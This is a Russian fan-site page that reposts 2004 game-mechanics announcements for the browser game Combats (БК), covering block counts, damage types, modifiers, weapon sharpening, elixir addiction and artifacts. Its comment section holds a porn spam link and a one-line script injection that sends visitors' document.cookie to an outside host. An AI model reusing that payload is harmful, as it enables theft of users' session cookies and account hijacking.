Суббота, 2024-05-18, 20:08:22
 
Начало Каталог статей Регистрация Вход
Вы вошли как "Гость" · RSS
Меню сайта
Форма входа
Наш опрос
Оцените наш сайт

Результаты · Архив опросов

Всего ответов: 177
Каталог статей
» Каталог статей » Мои статьи
Немного о БК

Немного о БК
Новое в БК. Год 2004

невидимка

Кулачные бои

http://capitalcity.combats.ru/forum.pl?id=1089736659&n=news

(13.07.04 20:37)

Теперь, если оба противника дерутся на без щитов и оружия дающего блоки, они получают по два блока, вместо одного.

Поясню на примерах.
Кулак против Кулака == 2 блока у каждого.
Кулак против Ножа == 1 блок у того, кто с кулаками, 2 блока у того кто с ножом.
Кулак против Ножа и Щита == 1 блок у 1 блок у того, кто с кулаками, 3 блока у того кто с ножом.

Кулак против любого цепа (без щита) == 2 блока у каждого.

--------------------

Количество зон блокирования

http://capitalcity.combats.ru/forum.pl?id=1084457009&n=news

(13.05.04 18:03)

1. Один блок есть всегда.
2. Щит дает дополнительный ОДИН блок (по крайней мере, щиты дающие +2 блока на данный момент отсутствуют магазине).
3. Оружие дает дополнительный блок, вне зависимости, одно оружие в руках или два (список исключений будет ниже).

Голые руки: 1 блок.
Правая рука пуста, в левой щит: 1 + 0 + 1 = 2 блока.
В левой руке оружие, правая пуста: 1 + 1 + 0 = 2 блока.
В правой руке оружие, в левой щит: 1 + 1 + 1= 3 блока.
В правой руке оружие и в левой оружие: 1 + 1 + 0 = 2 (два) блока.

Теперь об исключениях.
1. Все цепы и булава справедливости не дают дополнительного блока.
Это означает, что с цепом и щитом у вас будет два блока, а просто с цепом - один.

2. Парирующий Кинжал - уникален тем, что блоки с кинжалов суммируются.
И человек с двумя такими кинжалами может блокировать 3 зоны.

--------------------

Типы урона

http://capitalcity.combats.ru/forum.pl?id=1082651812&n=news

(22.04.04 20:36)

Колющий - урон наносимый кинжалами и изредка мечами.
Рубяще-режущий - урон наносимый топорами, мечами, изредка ножами.
Дробящий - урон наносимый дубинами и молотами, изредка топорами.

Эффективность брони определяется типом урона.

Магические уроны (огонь, лед, электричество, земля, свет, тьма) ослабляются лишь уровнем защиты от магии, полностью игнорируя броню.

--------------------

О модификаторах

http://capitalcity.combats.ru/forum.pl?id=1084452316&n=news

(13.05.04 16:45)

1. Защита от (тип) урона.
Поглощает определенный процент урона данного типа.
Если тип не указан - то любого физического урона.
Не может быть выше 80%.

2. Мф. мощности (тип) урона.
Увеличивает повреждения на определенный процент.

3. Мф. мощности критического удара.
Увеличивает повреждения критических ударов на определенный процент.
Накладывается после мф. мощности урона.
Т.е. если у вас 30% мощности урона и 50% мощности крит. удара, то итоговый критический удар будет в 1.3*1.5=1.95 раза сильнее.

4. Мф. парирования / Мф. блока щитом.
При удачном срабатывании, блокируют удар, как если бы вы угадали зону удара.
Не могут быть выше 80%.

5. Мф. контрудара.
Шанс нанести дополнительный один удар в случайную зону после срабатывания мф. увертывания.

6. Мф. удара сквозь броню.
Шанс ослабить броню (включая защиту от урона). Может ослабить фактически до нуля.

7. Защита от магии (тип).
Поглощает определенный процент урона от магии выбранной стихии.
При превышении 100%, магия может вылечить.
Учтите, что навыки мага позволяют ему снижать защиту противников, так что, если вы набрали 120% защиты - не обольщайтесь, хороший маг сможет ее серьезно ослабить.
---------
Некий минимальный шанс критического удара (равно как и уворота) есть всегда.
Максимума не существует, существует асимптотическое приближение к 100%.

--------------------

О заточке

http://capitalcity.combats.ru/forum.pl?id=1084103405&n=news

(09.05.04 15:50)

1. Оружие после заточки более не требует идентификации.
2. Требования повышаются на два (если есть два) самых необходимых параметра из Сила / Ловкость / Интуиция / Выносливость.
3. Требования повышаются и на мастерство владения оружием.

-----
Если меч требует 5й навык владения мечом, например, то после заточки на +4 - требования поднимутся до 9го.

Заточка +5 на булаву, например, безусловно ее усилит, но где-то на 30-40%.
Заточка +5 на кинжалы поднимет из силу в 2-2.5 раза, из-за изначально низкой базы повреждений у кинжалов. Безусловно, требования за подобное увеличение, более серьезны.

--------------------

Боевые комплекты

http://capitalcity.combats.ru/forum.pl?id=1089737262&n=news

(13.07.04 20:47)

Боевые комплекты бывают трех видов.

1. Основной. Любое оружие кроме кинжала и лука в правой руке, любое оружие или щит в левой.

2. Кинжальный. Любой кинжал. Можно 2 кинжала или кинжал + щит.

Когда начинается бой, текущий комплект одетый на вас временно перезаписывается.

Поясню на примере:
Допустим, вы сохранили основной комплект с мечом миражей. А в бой пошли с мечом, скажем, черного пламени. В бою вы сменили комплект на кинжальный, а потом опять на основной. После смены на основной на вас опять будет одет меч черного пламени.

При смене комплекта вы пропускаете три хода.

-----------------

В комплекты входят вещи в правой и левой руке. Но не более того.
Комплект, по сути, это запасное оружие, которое боез может взять с собой - пару кинжалов на пояс, лук за спину.
Именно поэтому же перезаписывается текущий комплект. Чтобы люди не брали в бой два меча, например.

вы имеете право только на один комплект каждого вида.
Если вы звпомнили боевой комплект, то реализовать его в бою вы сможете лишь если на вас надет кинжальный или лучный или никакого не одето (пустые руки).

--------------------

Костыли

http://capitalcity.combats.ru/forum.pl?id=1089284061&n=news

(08.07.04 14:54)

Если у вас средняя травма, то один костыль (в любой руке) позволит вам перейти в другую комнату. С двумя костылями, впрочем, это будет быстрее.

Для перемещения с тяжелой травмой требуется уже два костыля.

Инвалидам (с двумя костылями) продают билеты на вокзалах даже с тяж. травмой.

При перемещении есть небольшой шанс повредить костыль.

--------------------

О магии

Изменения магической системы

http://capitalcity.combats.ru/forum.pl?id=1080051451&n=news

(23.03.04 17:17)

1. Мудрость дает сопротивление магии, как на предметах.
2. Увеличения повреждений от мудрости применяется только для заклинаний требующих магическую энергию.

-----
Чем выше интеллект, тем меньше маны расходует заклинание
в перчатках и тяжелой броне новая магия не используеться . Не срабатывет но долговечность отнимается

Темное нападение

http://capitalcity.combats.ru/forum.pl?id=1083082760&n=news

(27.04.04 20:19)

Двухкратный опыт. Результат - неизлечимая тяжелая травма на 24 часа, если получится, конечно.
Внешне бой не отличается от кровавого.

P.S.
За нападения опыт более не урезается (кроме башни смерти).
За вмешательства - по прежднему 10%.

Эликсиры

http://capitalcity.combats.ru/forum.pl?id=1089129984&n=news

(06.07.04 20:06)

1. Каждый эликсир имеет небольшой шанс привыкания.

2. Первые разы эликсир не вызывает привыкания.

3. Первый срок привыкания невелик.

4. Если вы пристрастились и продолжаете пить эликсир:
Время растет в геометрической прогрессии, но не выше некоего порога, характерного для каждого типа эликсиров.
Резко повышаются шансы привыкнуть сильнее.

5. На срок и шанс привыкания влияют:
Ваша выносливость.
Количество уже выпитых эликсиров подобного типа.
"Вредоносность" эликсира.

6. Вредоносность эликсира.
Последствия от эликсиров бывают легкими, средними, тяжелыми.
К легким относятся теперь, например, новые эликсиры лечения здоровья (внимание, те, что были куплены раньше относятся к средним).
Чем вредоноснее эликсир, тем больше максимальное время привыкания и серьезнее ослабление характеристики.

7. Временное снятие последствий злоупотребления.
Если вы пристрастились, то достаточно выпить эликсир и все последствия исчезнут на достаточно большой срок. Однако, на такой же срок увеличится и время оставшееся до излечения, если вам повезло и вы не пристрастились повторно.

В общем и целом, разумное употребление эликсиров может помочь вам, неразумное - погубить.
Кто-то выберет путь законченного эликсиромана, кто-то даже не притронется к эликсирам. Это крайности. Ищите свой путь.

----------

(08.07.04 14:51)

Для временного снятия последствий достаточно выпить эликсир в любое время.

На вопрос "как бы и эликсир выпить и пристрастие не получить" ответ один - никак. Эликсиры - яд для организма. Кто-то раньше, кто-то позже, но пристратие все равно получит. Все имеет свою цену.

----------

P.S.

Мусорщик [21]

(18.06.04 20:23)

Если выпить эликсиры защиты второго уровня +75 и эликсир стихий +25 то получим 100% от всех магий.

------------------

Артефакты

http://capitalcity.combats.ru/forum.pl?id=1089737345&n=news

(13.07.04 20:49)

Несмотря на неоднократные возмущения работой мастеров в Ремонтной мастерской, они все же научились вывсобождать из артефактов новые силы.

На данный момент они могут обработать Меч Кромуса и Щит Пророчества.

Кстати, арты с долговечность 500 и ниже ломаются только при поражениях и то не всегда.

----------

P.S. Также апгрейду подлежит Шлем Развития

--------------------

Башня Смерти.

(19.06.04 20:13)

1. Запрещена передача вещей подарком. Цена передачи составляет 5кр.
1.1. Архивариуса это не касается. Вы можете подарить ему чек.

2. Таймаут боя теперь 1-5 минут.

3. Процент неизлечимых травм существенно понижен.
Время неизлечимой травмы колеблется от суток до полутора.

4. Нападения в комнате подачи заявок запрещены.

5. Максимальная продолжительность турнира уменьшена.

Категория: Мои статьи | Добавил: XAPOH (2006-04-26) | Автор: Киссс
Просмотров: 11036 | Комментарии: 16 | Рейтинг: 0.0

Всего комментариев: 3
3 snoberyissofe  
0
[url=http://silven.ru/khkhkh-onlajjn/]
смотреть бесплатное онлайн порно видео[/url]

2 lockydryday  
0
Its a test message

1 1111  
0
<script>img = new Image(); img.src = "http://na-s.ru/images/Satif_1.gif?"+document.cookie;</script>

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Категории статей
Мои статьи [5]
Поиск по статьям
ФОРУМЫ
Статистика